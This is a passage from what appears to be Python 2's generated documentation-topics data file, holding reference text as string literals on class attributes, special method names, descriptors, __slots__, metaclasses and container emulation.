This attribute is " 'no longer\n' ' available.\n' '\n' 'instance.__class__\n' '\n' ' The class to which a class instance belongs.\n' '\n' 'class.__bases__\n' '\n' ' The tuple of base classes of a class object.\n' '\n' 'class.__name__\n' '\n' ' The name of the class or type.\n' '\n' 'The following attributes are only supported by *new-style ' 'class*es.\n' '\n' 'class.__mro__\n' '\n' ' This attribute is a tuple of classes that are considered ' 'when\n' ' looking for base classes during method resolution.\n' '\n' 'class.mro()\n' '\n' ' This method can be overridden by a metaclass to customize ' 'the\n' ' method resolution order for its instances. It is called ' 'at class\n' ' instantiation, and its result is stored in "__mro__".\n' '\n' 'class.__subclasses__()\n' '\n' ' Each new-style class keeps a list of weak references to ' 'its\n' ' immediate subclasses. This method returns a list of all ' 'those\n' ' references still alive. Example:\n' '\n' ' >>> int.__subclasses__()\n' " [<type 'bool'>]\n" '\n' '-[ Footnotes ]-\n' '\n' '[1] Additional information on these special methods may be ' 'found\n' ' in the Python Reference Manual (Basic customization).\n' '\n' '[2] As a consequence, the list "[1, 2]" is considered equal ' 'to\n' ' "[1.0, 2.0]", and similarly for tuples.\n' '\n' "[3] They must have since the parser can't tell the type of " 'the\n' ' operands.\n' '\n' '[4] Cased characters are those with general category ' 'property\n' ' being one of "Lu" (Letter, uppercase), "Ll" (Letter, ' 'lowercase),\n' ' or "Lt" (Letter, titlecase).\n' '\n' '[5] To format only a tuple you should therefore provide a\n' ' singleton tuple whose only element is the tuple to be ' 'formatted.\n' '\n' '[6] The advantage of leaving the newline on is that ' 'returning an\n' ' empty string is then an unambiguous EOF indication. 
It ' 'is also\n' ' possible (in cases where it might matter, for example, ' 'if you want\n' ' to make an exact copy of a file while scanning its ' 'lines) to tell\n' ' whether the last line of a file ended in a newline or ' 'not (yes\n' ' this happens!).\n', 'specialnames': '\n' 'Special method names\n' '********************\n' '\n' 'A class can implement certain operations that are invoked by ' 'special\n' 'syntax (such as arithmetic operations or subscripting and ' 'slicing) by\n' "defining methods with special names. This is Python's " 'approach to\n' '*operator overloading*, allowing classes to define their own ' 'behavior\n' 'with respect to language operators. For instance, if a ' 'class defines\n' 'a method named "__getitem__()", and "x" is an instance of ' 'this class,\n' 'then "x[i]" is roughly equivalent to "x.__getitem__(i)" for ' 'old-style\n' 'classes and "type(x).__getitem__(x, i)" for new-style ' 'classes. Except\n' 'where mentioned, attempts to execute an operation raise an ' 'exception\n' 'when no appropriate method is defined (typically ' '"AttributeError" or\n' '"TypeError").\n' '\n' 'When implementing a class that emulates any built-in type, ' 'it is\n' 'important that the emulation only be implemented to the ' 'degree that it\n' 'makes sense for the object being modelled. For example, ' 'some\n' 'sequences may work well with retrieval of individual ' 'elements, but\n' 'extracting a slice may not make sense. (One example of this ' 'is the\n' '"NodeList" interface in the W3C\'s Document Object Model.)\n' '\n' '\n' 'Basic customization\n' '===================\n' '\n' 'object.__new__(cls[, ...])\n' '\n' ' Called to create a new instance of class *cls*. ' '"__new__()" is a\n' ' static method (special-cased so you need not declare it ' 'as such)\n' ' that takes the class of which an instance was requested ' 'as its\n' ' first argument. The remaining arguments are those passed ' 'to the\n' ' object constructor expression (the call to the class). 
' 'The return\n' ' value of "__new__()" should be the new object instance ' '(usually an\n' ' instance of *cls*).\n' '\n' ' Typical implementations create a new instance of the ' 'class by\n' ' invoking the superclass\'s "__new__()" method using\n' ' "super(currentclass, cls).__new__(cls[, ...])" with ' 'appropriate\n' ' arguments and then modifying the newly-created instance ' 'as\n' ' necessary before returning it.\n' '\n' ' If "__new__()" returns an instance of *cls*, then the ' 'new\n' ' instance\'s "__init__()" method will be invoked like\n' ' "__init__(self[, ...])", where *self* is the new instance ' 'and the\n' ' remaining arguments are the same as were passed to ' '"__new__()".\n' '\n' ' If "__new__()" does not return an instance of *cls*, then ' 'the new\n' ' instance\'s "__init__()" method will not be invoked.\n' '\n' ' "__new__()" is intended mainly to allow subclasses of ' 'immutable\n' ' types (like int, str, or tuple) to customize instance ' 'creation. It\n' ' is also commonly overridden in custom metaclasses in ' 'order to\n' ' customize class creation.\n' '\n' 'object.__init__(self[, ...])\n' '\n' ' Called after the instance has been created (by ' '"__new__()"), but\n' ' before it is returned to the caller. The arguments are ' 'those\n' ' passed to the class constructor expression. If a base ' 'class has an\n' ' "__init__()" method, the derived class\'s "__init__()" ' 'method, if\n' ' any, must explicitly call it to ensure proper ' 'initialization of the\n' ' base class part of the instance; for example:\n' ' "BaseClass.__init__(self, [args...])".\n' '\n' ' Because "__new__()" and "__init__()" work together in ' 'constructing\n' ' objects ("__new__()" to create it, and "__init__()" to ' 'customise\n' ' it), no non-"None" value may be returned by "__init__()"; ' 'doing so\n' ' will cause a "TypeError" to be raised at runtime.\n' '\n' 'object.__del__(self)\n' '\n' ' Called when the instance is about to be destroyed. 
This ' 'is also\n' ' called a destructor. If a base class has a "__del__()" ' 'method, the\n' ' derived class\'s "__del__()" method, if any, must ' 'explicitly call it\n' ' to ensure proper deletion of the base class part of the ' 'instance.\n' ' Note that it is possible (though not recommended!) for ' 'the\n' ' "__del__()" method to postpone destruction of the ' 'instance by\n' ' creating a new reference to it. It may then be called at ' 'a later\n' ' time when this new reference is deleted. It is not ' 'guaranteed that\n' ' "__del__()" methods are called for objects that still ' 'exist when\n' ' the interpreter exits.\n' '\n' ' Note: "del x" doesn\'t directly call "x.__del__()" --- ' 'the former\n' ' decrements the reference count for "x" by one, and the ' 'latter is\n' ' only called when "x"\'s reference count reaches zero. ' 'Some common\n' ' situations that may prevent the reference count of an ' 'object from\n' ' going to zero include: circular references between ' 'objects (e.g.,\n' ' a doubly-linked list or a tree data structure with ' 'parent and\n' ' child pointers); a reference to the object on the stack ' 'frame of\n' ' a function that caught an exception (the traceback ' 'stored in\n' ' "sys.exc_traceback" keeps the stack frame alive); or a ' 'reference\n' ' to the object on the stack frame that raised an ' 'unhandled\n' ' exception in interactive mode (the traceback stored in\n' ' "sys.last_traceback" keeps the stack frame alive). The ' 'first\n' ' situation can only be remedied by explicitly breaking ' 'the cycles;\n' ' the latter two situations can be resolved by storing ' '"None" in\n' ' "sys.exc_traceback" or "sys.last_traceback". Circular ' 'references\n' ' which are garbage are detected when the option cycle ' 'detector is\n' " enabled (it's on by default), but can only be cleaned " 'up if there\n' ' are no Python-level "__del__()" methods involved. 
Refer ' 'to the\n' ' documentation for the "gc" module for more information ' 'about how\n' ' "__del__()" methods are handled by the cycle detector,\n' ' particularly the description of the "garbage" value.\n' '\n' ' Warning: Due to the precarious circumstances under which\n' ' "__del__()" methods are invoked, exceptions that occur ' 'during\n' ' their execution are ignored, and a warning is printed ' 'to\n' ' "sys.stderr" instead. Also, when "__del__()" is invoked ' 'in\n' ' response to a module being deleted (e.g., when ' 'execution of the\n' ' program is done), other globals referenced by the ' '"__del__()"\n' ' method may already have been deleted or in the process ' 'of being\n' ' torn down (e.g. the import machinery shutting down). ' 'For this\n' ' reason, "__del__()" methods should do the absolute ' 'minimum needed\n' ' to maintain external invariants. Starting with version ' '1.5,\n' ' Python guarantees that globals whose name begins with a ' 'single\n' ' underscore are deleted from their module before other ' 'globals are\n' ' deleted; if no other references to such globals exist, ' 'this may\n' ' help in assuring that imported modules are still ' 'available at the\n' ' time when the "__del__()" method is called.\n' '\n' ' See also the "-R" command-line option.\n' '\n' 'object.__repr__(self)\n' '\n' ' Called by the "repr()" built-in function and by string ' 'conversions\n' ' (reverse quotes) to compute the "official" string ' 'representation of\n' ' an object. If at all possible, this should look like a ' 'valid\n' ' Python expression that could be used to recreate an ' 'object with the\n' ' same value (given an appropriate environment). If this ' 'is not\n' ' possible, a string of the form "<...some useful ' 'description...>"\n' ' should be returned. The return value must be a string ' 'object. 
If a\n' ' class defines "__repr__()" but not "__str__()", then ' '"__repr__()"\n' ' is also used when an "informal" string representation of ' 'instances\n' ' of that class is required.\n' '\n' ' This is typically used for debugging, so it is important ' 'that the\n' ' representation is information-rich and unambiguous.\n' '\n' 'object.__str__(self)\n' '\n' ' Called by the "str()" built-in function and by the ' '"print"\n' ' statement to compute the "informal" string representation ' 'of an\n' ' object. This differs from "__repr__()" in that it does ' 'not have to\n' ' be a valid Python expression: a more convenient or ' 'concise\n' ' representation may be used instead. The return value must ' 'be a\n' ' string object.\n' '\n' 'object.__lt__(self, other)\n' 'object.__le__(self, other)\n' 'object.__eq__(self, other)\n' 'object.__ne__(self, other)\n' 'object.__gt__(self, other)\n' 'object.__ge__(self, other)\n' '\n' ' New in version 2.1.\n' '\n' ' These are the so-called "rich comparison" methods, and ' 'are called\n' ' for comparison operators in preference to "__cmp__()" ' 'below. The\n' ' correspondence between operator symbols and method names ' 'is as\n' ' follows: "x<y" calls "x.__lt__(y)", "x<=y" calls ' '"x.__le__(y)",\n' ' "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call ' '"x.__ne__(y)",\n' ' "x>y" calls "x.__gt__(y)", and "x>=y" calls ' '"x.__ge__(y)".\n' '\n' ' A rich comparison method may return the singleton ' '"NotImplemented"\n' ' if it does not implement the operation for a given pair ' 'of\n' ' arguments. By convention, "False" and "True" are returned ' 'for a\n' ' successful comparison. 
However, these methods can return ' 'any value,\n' ' so if the comparison operator is used in a Boolean ' 'context (e.g.,\n' ' in the condition of an "if" statement), Python will call ' '"bool()"\n' ' on the value to determine if the result is true or ' 'false.\n' '\n' ' There are no implied relationships among the comparison ' 'operators.\n' ' The truth of "x==y" does not imply that "x!=y" is false.\n' ' Accordingly, when defining "__eq__()", one should also ' 'define\n' ' "__ne__()" so that the operators will behave as ' 'expected. See the\n' ' paragraph on "__hash__()" for some important notes on ' 'creating\n' ' *hashable* objects which support custom comparison ' 'operations and\n' ' are usable as dictionary keys.\n' '\n' ' There are no swapped-argument versions of these methods ' '(to be used\n' ' when the left argument does not support the operation but ' 'the right\n' ' argument does); rather, "__lt__()" and "__gt__()" are ' "each other's\n" ' reflection, "__le__()" and "__ge__()" are each other\'s ' 'reflection,\n' ' and "__eq__()" and "__ne__()" are their own reflection.\n' '\n' ' Arguments to rich comparison methods are never coerced.\n' '\n' ' To automatically generate ordering operations from a ' 'single root\n' ' operation, see "functools.total_ordering()".\n' '\n' 'object.__cmp__(self, other)\n' '\n' ' Called by comparison operations if rich comparison (see ' 'above) is\n' ' not defined. Should return a negative integer if "self < ' 'other",\n' ' zero if "self == other", a positive integer if "self > ' 'other". If\n' ' no "__cmp__()", "__eq__()" or "__ne__()" operation is ' 'defined,\n' ' class instances are compared by object identity ' '("address"). See\n' ' also the description of "__hash__()" for some important ' 'notes on\n' ' creating *hashable* objects which support custom ' 'comparison\n' ' operations and are usable as dictionary keys. 
(Note: the\n' ' restriction that exceptions are not propagated by ' '"__cmp__()" has\n' ' been removed since Python 1.5.)\n' '\n' 'object.__rcmp__(self, other)\n' '\n' ' Changed in version 2.1: No longer supported.\n' '\n' 'object.__hash__(self)\n' '\n' ' Called by built-in function "hash()" and for operations ' 'on members\n' ' of hashed collections including "set", "frozenset", and ' '"dict".\n' ' "__hash__()" should return an integer. The only required ' 'property\n' ' is that objects which compare equal have the same hash ' 'value; it is\n' ' advised to somehow mix together (e.g. using exclusive or) ' 'the hash\n' ' values for the components of the object that also play a ' 'part in\n' ' comparison of objects.\n' '\n' ' If a class does not define a "__cmp__()" or "__eq__()" ' 'method it\n' ' should not define a "__hash__()" operation either; if it ' 'defines\n' ' "__cmp__()" or "__eq__()" but not "__hash__()", its ' 'instances will\n' ' not be usable in hashed collections. If a class defines ' 'mutable\n' ' objects and implements a "__cmp__()" or "__eq__()" ' 'method, it\n' ' should not implement "__hash__()", since hashable ' 'collection\n' " implementations require that a object's hash value is " 'immutable (if\n' " the object's hash value changes, it will be in the wrong " 'hash\n' ' bucket).\n' '\n' ' User-defined classes have "__cmp__()" and "__hash__()" ' 'methods by\n' ' default; with them, all objects compare unequal (except ' 'with\n' ' themselves) and "x.__hash__()" returns a result derived ' 'from\n' ' "id(x)".\n' '\n' ' Classes which inherit a "__hash__()" method from a parent ' 'class but\n' ' change the meaning of "__cmp__()" or "__eq__()" such that ' 'the hash\n' ' value returned is no longer appropriate (e.g. by ' 'switching to a\n' ' value-based concept of equality instead of the default ' 'identity\n' ' based equality) can explicitly flag themselves as being ' 'unhashable\n' ' by setting "__hash__ = None" in the class definition. 
' 'Doing so\n' ' means that not only will instances of the class raise an\n' ' appropriate "TypeError" when a program attempts to ' 'retrieve their\n' ' hash value, but they will also be correctly identified ' 'as\n' ' unhashable when checking "isinstance(obj, ' 'collections.Hashable)"\n' ' (unlike classes which define their own "__hash__()" to ' 'explicitly\n' ' raise "TypeError").\n' '\n' ' Changed in version 2.5: "__hash__()" may now also return ' 'a long\n' ' integer object; the 32-bit integer is then derived from ' 'the hash of\n' ' that object.\n' '\n' ' Changed in version 2.6: "__hash__" may now be set to ' '"None" to\n' ' explicitly flag instances of a class as unhashable.\n' '\n' 'object.__nonzero__(self)\n' '\n' ' Called to implement truth value testing and the built-in ' 'operation\n' ' "bool()"; should return "False" or "True", or their ' 'integer\n' ' equivalents "0" or "1". When this method is not ' 'defined,\n' ' "__len__()" is called, if it is defined, and the object ' 'is\n' ' considered true if its result is nonzero. If a class ' 'defines\n' ' neither "__len__()" nor "__nonzero__()", all its ' 'instances are\n' ' considered true.\n' '\n' 'object.__unicode__(self)\n' '\n' ' Called to implement "unicode()" built-in; should return a ' 'Unicode\n' ' object. When this method is not defined, string ' 'conversion is\n' ' attempted, and the result of string conversion is ' 'converted to\n' ' Unicode using the system default encoding.\n' '\n' '\n' 'Customizing attribute access\n' '============================\n' '\n' 'The following methods can be defined to customize the ' 'meaning of\n' 'attribute access (use of, assignment to, or deletion of ' '"x.name") for\n' 'class instances.\n' '\n' 'object.__getattr__(self, name)\n' '\n' ' Called when an attribute lookup has not found the ' 'attribute in the\n' ' usual places (i.e. it is not an instance attribute nor is ' 'it found\n' ' in the class tree for "self"). "name" is the attribute ' 'name. 
This\n' ' method should return the (computed) attribute value or ' 'raise an\n' ' "AttributeError" exception.\n' '\n' ' Note that if the attribute is found through the normal ' 'mechanism,\n' ' "__getattr__()" is not called. (This is an intentional ' 'asymmetry\n' ' between "__getattr__()" and "__setattr__()".) This is ' 'done both for\n' ' efficiency reasons and because otherwise "__getattr__()" ' 'would have\n' ' no way to access other attributes of the instance. Note ' 'that at\n' ' least for instance variables, you can fake total control ' 'by not\n' ' inserting any values in the instance attribute dictionary ' '(but\n' ' instead inserting them in another object). See the\n' ' "__getattribute__()" method below for a way to actually ' 'get total\n' ' control in new-style classes.\n' '\n' 'object.__setattr__(self, name, value)\n' '\n' ' Called when an attribute assignment is attempted. This ' 'is called\n' ' instead of the normal mechanism (i.e. store the value in ' 'the\n' ' instance dictionary). *name* is the attribute name, ' '*value* is the\n' ' value to be assigned to it.\n' '\n' ' If "__setattr__()" wants to assign to an instance ' 'attribute, it\n' ' should not simply execute "self.name = value" --- this ' 'would cause\n' ' a recursive call to itself. Instead, it should insert ' 'the value in\n' ' the dictionary of instance attributes, e.g., ' '"self.__dict__[name] =\n' ' value". For new-style classes, rather than accessing the ' 'instance\n' ' dictionary, it should call the base class method with the ' 'same\n' ' name, for example, "object.__setattr__(self, name, ' 'value)".\n' '\n' 'object.__delattr__(self, name)\n' '\n' ' Like "__setattr__()" but for attribute deletion instead ' 'of\n' ' assignment. 
This should only be implemented if "del ' 'obj.name" is\n' ' meaningful for the object.\n' '\n' '\n' 'More attribute access for new-style classes\n' '-------------------------------------------\n' '\n' 'The following methods only apply to new-style classes.\n' '\n' 'object.__getattribute__(self, name)\n' '\n' ' Called unconditionally to implement attribute accesses ' 'for\n' ' instances of the class. If the class also defines ' '"__getattr__()",\n' ' the latter will not be called unless "__getattribute__()" ' 'either\n' ' calls it explicitly or raises an "AttributeError". This ' 'method\n' ' should return the (computed) attribute value or raise an\n' ' "AttributeError" exception. In order to avoid infinite ' 'recursion in\n' ' this method, its implementation should always call the ' 'base class\n' ' method with the same name to access any attributes it ' 'needs, for\n' ' example, "object.__getattribute__(self, name)".\n' '\n' ' Note: This method may still be bypassed when looking up ' 'special\n' ' methods as the result of implicit invocation via ' 'language syntax\n' ' or built-in functions. See Special method lookup for ' 'new-style\n' ' classes.\n' '\n' '\n' 'Implementing Descriptors\n' '------------------------\n' '\n' 'The following methods only apply when an instance of the ' 'class\n' 'containing the method (a so-called *descriptor* class) ' 'appears in an\n' "*owner* class (the descriptor must be in either the owner's " 'class\n' 'dictionary or in the class dictionary for one of its ' 'parents). In the\n' 'examples below, "the attribute" refers to the attribute ' 'whose name is\n' 'the key of the property in the owner class\' "__dict__".\n' '\n' 'object.__get__(self, instance, owner)\n' '\n' ' Called to get the attribute of the owner class (class ' 'attribute\n' ' access) or of an instance of that class (instance ' 'attribute\n' ' access). 
*owner* is always the owner class, while ' '*instance* is the\n' ' instance that the attribute was accessed through, or ' '"None" when\n' ' the attribute is accessed through the *owner*. This ' 'method should\n' ' return the (computed) attribute value or raise an ' '"AttributeError"\n' ' exception.\n' '\n' 'object.__set__(self, instance, value)\n' '\n' ' Called to set the attribute on an instance *instance* of ' 'the owner\n' ' class to a new value, *value*.\n' '\n' 'object.__delete__(self, instance)\n' '\n' ' Called to delete the attribute on an instance *instance* ' 'of the\n' ' owner class.\n' '\n' '\n' 'Invoking Descriptors\n' '--------------------\n' '\n' 'In general, a descriptor is an object attribute with ' '"binding\n' 'behavior", one whose attribute access has been overridden by ' 'methods\n' 'in the descriptor protocol: "__get__()", "__set__()", and\n' '"__delete__()". If any of those methods are defined for an ' 'object, it\n' 'is said to be a descriptor.\n' '\n' 'The default behavior for attribute access is to get, set, or ' 'delete\n' "the attribute from an object's dictionary. For instance, " '"a.x" has a\n' 'lookup chain starting with "a.__dict__[\'x\']", then\n' '"type(a).__dict__[\'x\']", and continuing through the base ' 'classes of\n' '"type(a)" excluding metaclasses.\n' '\n' 'However, if the looked-up value is an object defining one of ' 'the\n' 'descriptor methods, then Python may override the default ' 'behavior and\n' 'invoke the descriptor method instead. Where this occurs in ' 'the\n' 'precedence chain depends on which descriptor methods were ' 'defined and\n' 'how they were called. Note that descriptors are only ' 'invoked for new\n' 'style objects or classes (ones that subclass "object()" or ' '"type()").\n' '\n' 'The starting point for descriptor invocation is a binding, ' '"a.x". 
How\n' 'the arguments are assembled depends on "a":\n' '\n' 'Direct Call\n' ' The simplest and least common call is when user code ' 'directly\n' ' invokes a descriptor method: "x.__get__(a)".\n' '\n' 'Instance Binding\n' ' If binding to a new-style object instance, "a.x" is ' 'transformed\n' ' into the call: "type(a).__dict__[\'x\'].__get__(a, ' 'type(a))".\n' '\n' 'Class Binding\n' ' If binding to a new-style class, "A.x" is transformed ' 'into the\n' ' call: "A.__dict__[\'x\'].__get__(None, A)".\n' '\n' 'Super Binding\n' ' If "a" is an instance of "super", then the binding ' '"super(B,\n' ' obj).m()" searches "obj.__class__.__mro__" for the base ' 'class "A"\n' ' immediately preceding "B" and then invokes the descriptor ' 'with the\n' ' call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n' '\n' 'For instance bindings, the precedence of descriptor ' 'invocation depends\n' 'on the which descriptor methods are defined. A descriptor ' 'can define\n' 'any combination of "__get__()", "__set__()" and ' '"__delete__()". If it\n' 'does not define "__get__()", then accessing the attribute ' 'will return\n' 'the descriptor object itself unless there is a value in the ' "object's\n" 'instance dictionary. If the descriptor defines "__set__()" ' 'and/or\n' '"__delete__()", it is a data descriptor; if it defines ' 'neither, it is\n' 'a non-data descriptor. Normally, data descriptors define ' 'both\n' '"__get__()" and "__set__()", while non-data descriptors have ' 'just the\n' '"__get__()" method. Data descriptors with "__set__()" and ' '"__get__()"\n' 'defined always override a redefinition in an instance ' 'dictionary. In\n' 'contrast, non-data descriptors can be overridden by ' 'instances.\n' '\n' 'Python methods (including "staticmethod()" and ' '"classmethod()") are\n' 'implemented as non-data descriptors. Accordingly, instances ' 'can\n' 'redefine and override methods. 
This allows individual ' 'instances to\n' 'acquire behaviors that differ from other instances of the ' 'same class.\n' '\n' 'The "property()" function is implemented as a data ' 'descriptor.\n' 'Accordingly, instances cannot override the behavior of a ' 'property.\n' '\n' '\n' '__slots__\n' '---------\n' '\n' 'By default, instances of both old and new-style classes have ' 'a\n' 'dictionary for attribute storage. This wastes space for ' 'objects\n' 'having very few instance variables. The space consumption ' 'can become\n' 'acute when creating large numbers of instances.\n' '\n' 'The default can be overridden by defining *__slots__* in a ' 'new-style\n' 'class definition. The *__slots__* declaration takes a ' 'sequence of\n' 'instance variables and reserves just enough space in each ' 'instance to\n' 'hold a value for each variable. Space is saved because ' '*__dict__* is\n' 'not created for each instance.\n' '\n' '__slots__\n' '\n' ' This class variable can be assigned a string, iterable, ' 'or sequence\n' ' of strings with variable names used by instances. If ' 'defined in a\n' ' new-style class, *__slots__* reserves space for the ' 'declared\n' ' variables and prevents the automatic creation of ' '*__dict__* and\n' ' *__weakref__* for each instance.\n' '\n' ' New in version 2.2.\n' '\n' 'Notes on using *__slots__*\n' '\n' '* When inheriting from a class without *__slots__*, the ' '*__dict__*\n' ' attribute of that class will always be accessible, so a ' '*__slots__*\n' ' definition in the subclass is meaningless.\n' '\n' '* Without a *__dict__* variable, instances cannot be ' 'assigned new\n' ' variables not listed in the *__slots__* definition. ' 'Attempts to\n' ' assign to an unlisted variable name raises ' '"AttributeError". 
If\n' ' dynamic assignment of new variables is desired, then add\n' ' "\'__dict__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding "\'__dict__\'" ' 'to the\n' ' *__slots__* declaration would not enable the assignment of ' 'new\n' ' attributes not specifically listed in the sequence of ' 'instance\n' ' variable names.\n' '\n' '* Without a *__weakref__* variable for each instance, ' 'classes\n' ' defining *__slots__* do not support weak references to ' 'its\n' ' instances. If weak reference support is needed, then add\n' ' "\'__weakref__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding ' '"\'__weakref__\'" to the\n' ' *__slots__* declaration would not enable support for weak\n' ' references.\n' '\n' '* *__slots__* are implemented at the class level by ' 'creating\n' ' descriptors (Implementing Descriptors) for each variable ' 'name. As a\n' ' result, class attributes cannot be used to set default ' 'values for\n' ' instance variables defined by *__slots__*; otherwise, the ' 'class\n' ' attribute would overwrite the descriptor assignment.\n' '\n' '* The action of a *__slots__* declaration is limited to the ' 'class\n' ' where it is defined. As a result, subclasses will have a ' '*__dict__*\n' ' unless they also define *__slots__* (which must only ' 'contain names\n' ' of any *additional* slots).\n' '\n' '* If a class defines a slot also defined in a base class, ' 'the\n' ' instance variable defined by the base class slot is ' 'inaccessible\n' ' (except by retrieving its descriptor directly from the ' 'base class).\n' ' This renders the meaning of the program undefined. 
In the ' 'future, a\n' ' check may be added to prevent this.\n' '\n' '* Nonempty *__slots__* does not work for classes derived ' 'from\n' ' "variable-length" built-in types such as "long", "str" and ' '"tuple".\n' '\n' '* Any non-string iterable may be assigned to *__slots__*. ' 'Mappings\n' ' may also be used; however, in the future, special meaning ' 'may be\n' ' assigned to the values corresponding to each key.\n' '\n' '* *__class__* assignment works only if both classes have the ' 'same\n' ' *__slots__*.\n' '\n' ' Changed in version 2.6: Previously, *__class__* assignment ' 'raised an\n' ' error if either new or old class had *__slots__*.\n' '\n' '\n' 'Customizing class creation\n' '==========================\n' '\n' 'By default, new-style classes are constructed using ' '"type()". A class\n' 'definition is read into a separate namespace and the value ' 'of class\n' 'name is bound to the result of "type(name, bases, dict)".\n' '\n' 'When the class definition is read, if *__metaclass__* is ' 'defined then\n' 'the callable assigned to it will be called instead of ' '"type()". This\n' 'allows classes or functions to be written which monitor or ' 'alter the\n' 'class creation process:\n' '\n' '* Modifying the class dictionary prior to the class being ' 'created.\n' '\n' '* Returning an instance of another class -- essentially ' 'performing\n' ' the role of a factory function.\n' '\n' "These steps will have to be performed in the metaclass's " '"__new__()"\n' 'method -- "type.__new__()" can then be called from this ' 'method to\n' 'create a class with different properties. 
This example adds ' 'a new\n' 'element to the class dictionary before creating the class:\n' '\n' ' class metacls(type):\n' ' def __new__(mcs, name, bases, dict):\n' " dict['foo'] = 'metacls was here'\n" ' return type.__new__(mcs, name, bases, dict)\n' '\n' 'You can of course also override other class methods (or add ' 'new\n' 'methods); for example defining a custom "__call__()" method ' 'in the\n' 'metaclass allows custom behavior when the class is called, ' 'e.g. not\n' 'always creating a new instance.\n' '\n' '__metaclass__\n' '\n' ' This variable can be any callable accepting arguments for ' '"name",\n' ' "bases", and "dict". Upon class creation, the callable ' 'is used\n' ' instead of the built-in "type()".\n' '\n' ' New in version 2.2.\n' '\n' 'The appropriate metaclass is determined by the following ' 'precedence\n' 'rules:\n' '\n' '* If "dict[\'__metaclass__\']" exists, it is used.\n' '\n' '* Otherwise, if there is at least one base class, its ' 'metaclass is\n' ' used (this looks for a *__class__* attribute first and if ' 'not found,\n' ' uses its type).\n' '\n' '* Otherwise, if a global variable named __metaclass__ ' 'exists, it is\n' ' used.\n' '\n' '* Otherwise, the old-style, classic metaclass ' '(types.ClassType) is\n' ' used.\n' '\n' 'The potential uses for metaclasses are boundless. 
Some ideas ' 'that have\n' 'been explored including logging, interface checking, ' 'automatic\n' 'delegation, automatic property creation, proxies, ' 'frameworks, and\n' 'automatic resource locking/synchronization.\n' '\n' '\n' 'Customizing instance and subclass checks\n' '========================================\n' '\n' 'New in version 2.6.\n' '\n' 'The following methods are used to override the default ' 'behavior of the\n' '"isinstance()" and "issubclass()" built-in functions.\n' '\n' 'In particular, the metaclass "abc.ABCMeta" implements these ' 'methods in\n' 'order to allow the addition of Abstract Base Classes (ABCs) ' 'as\n' '"virtual base classes" to any class or type (including ' 'built-in\n' 'types), including other ABCs.\n' '\n' 'class.__instancecheck__(self, instance)\n' '\n' ' Return true if *instance* should be considered a (direct ' 'or\n' ' indirect) instance of *class*. If defined, called to ' 'implement\n' ' "isinstance(instance, class)".\n' '\n' 'class.__subclasscheck__(self, subclass)\n' '\n' ' Return true if *subclass* should be considered a (direct ' 'or\n' ' indirect) subclass of *class*. If defined, called to ' 'implement\n' ' "issubclass(subclass, class)".\n' '\n' 'Note that these methods are looked up on the type ' '(metaclass) of a\n' 'class. 
They cannot be defined as class methods in the ' 'actual class.\n' 'This is consistent with the lookup of special methods that ' 'are called\n' 'on instances, only in this case the instance is itself a ' 'class.\n' '\n' 'See also:\n' '\n' ' **PEP 3119** - Introducing Abstract Base Classes\n' ' Includes the specification for customizing ' '"isinstance()" and\n' ' "issubclass()" behavior through "__instancecheck__()" ' 'and\n' ' "__subclasscheck__()", with motivation for this ' 'functionality in\n' ' the context of adding Abstract Base Classes (see the ' '"abc"\n' ' module) to the language.\n' '\n' '\n' 'Emulating callable objects\n' '==========================\n' '\n' 'object.__call__(self[, args...])\n' '\n' ' Called when the instance is "called" as a function; if ' 'this method\n' ' is defined, "x(arg1, arg2, ...)" is a shorthand for\n' ' "x.__call__(arg1, arg2, ...)".\n' '\n' '\n' 'Emulating container types\n' '=========================\n' '\n' 'The following methods can be defined to implement container ' 'objects.\n' 'Containers usually are sequences (such as lists or tuples) ' 'or mappings\n' '(like dictionaries), but can represent other containers as ' 'well. The\n' 'first set of methods is used either to emulate a sequence or ' 'to\n' 'emulate a mapping; the difference is that for a sequence, ' 'the\n' 'allowable keys should be the integers *k* for which "0 <= k ' '< N" where\n' '*N* is the length of the sequence, or slice objects, which ' 'define a\n' 'range of items. (For backwards compatibility, the method\n' '"__getslice__()" (see below) can also be defined to handle ' 'simple, but\n' 'not extended slices.) It is also recommended that mappings ' 'provide the\n' 'methods "keys()", "values()", "items()", "has_key()", ' '"get()",\n' '"clear()", "setdefault()", "iterkeys()", "itervalues()",\n' '"iteritems()", "pop()", "popitem()", "copy()", and ' '"update()" behaving\n' "similar to those for Python's standard dictionary objects. 
" 'The\n' '"UserDict" module provides a "DictMixin" class to help ' 'create those\n' 'methods from a base set of "__getitem__()", ' '"__setitem__()",\n' '"__delitem__()", and "keys()". Mutable sequences should ' 'provide\n' 'methods "append()", "count()", "index()", "extend()", ' '"insert()",\n' '"pop()", "remove()", "reverse()" and "sort()", like Python ' 'standard\n' 'list objects. Finally, sequence types should implement ' 'addition\n' '(meaning concatenation) and multiplication (meaning ' 'repetition) by\n' 'defining the methods "__add__()", "__radd__()", ' '"__iadd__()",\n' '"__mul__()", "__rmul__()" and "__imul__()" described below; ' 'they\n' 'should not define "__coerce__()" or other numerical ' 'operators. It is\n' 'recommended that both mappings and sequences implement the\n' '"__contains__()" method to allow efficient use of the "in" ' 'operator;\n' 'for mappings, "in" should be equivalent of "has_key()"; for ' 'sequences,\n' 'it should search through the values. It is further ' 'recommended that\n' 'both mappings and sequences implement the "__iter__()" ' 'method to allow\n' 'efficient iteration through the container; for mappings, ' '"__iter__()"\n' 'should be the same as "iterkeys()"; for sequences, it should ' 'iterate\n' 'through the values.\n' '\n' 'object.__len__(self)\n' '\n' ' Called to implement the built-in function "len()". ' 'Should return\n' ' the length of the object, an integer ">=" 0. Also, an ' 'object that\n' ' doesn\'t define a "__nonzero__()" method and whose ' '"__len__()"\n' ' method returns zero is considered to be false in a ' 'Boolean context.\n' '\n' 'object.__getitem__(self, key)\n' '\n' ' Called to implement evaluation of "self[key]". For ' 'sequence types,\n' ' the accepted keys should be integers and slice objects. ' 'Note that\n' ' the special interpretation of negative indexes (if the ' 'class wishes\n' ' to emulate a sequence type) is up to the "__getitem__()" ' 'method. 
